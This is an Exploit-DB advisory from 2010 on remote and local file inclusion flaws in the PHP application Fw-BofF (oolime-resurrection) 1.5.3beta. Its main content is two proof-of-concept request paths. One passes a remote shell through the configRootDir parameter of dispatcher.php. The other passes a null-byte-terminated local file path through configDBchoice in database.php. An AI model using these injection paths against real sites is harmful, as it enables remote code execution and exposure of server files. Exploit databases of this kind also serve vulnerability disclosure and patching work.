Fw-BofF oolime-resurrection 1.5.3beta - Multiple Remote Include Vulnerability

2010-03-21T00:00:00
ID EDB-ID:11830
Type exploitdb
Reporter cr4wl3r
Modified 2010-03-21T00:00:00

Description

Fw-BofF (oolime-resurrection) 1.5.3beta Multiple Remote Include Vulnerability. Webapps exploit for php platform

                                        
                                            =============================================================================
Fw-BofF (oolime-resurrection) 1.5.3beta Multiple Remote Include Vulnerability
=============================================================================


[+] Fw-BofF (oolime-resurrection) 1.5.3beta Multiple Remote Include Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11391
[+] Download: http://code.google.com/p/oolime-resurrection/downloads/list

[+] PoC RFI: [path]/core/dispatcher.php?configRootDir=[Shell]

[+] PoC LFI: [path]/core/database.php?configDBchoice=[LFI%00]

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]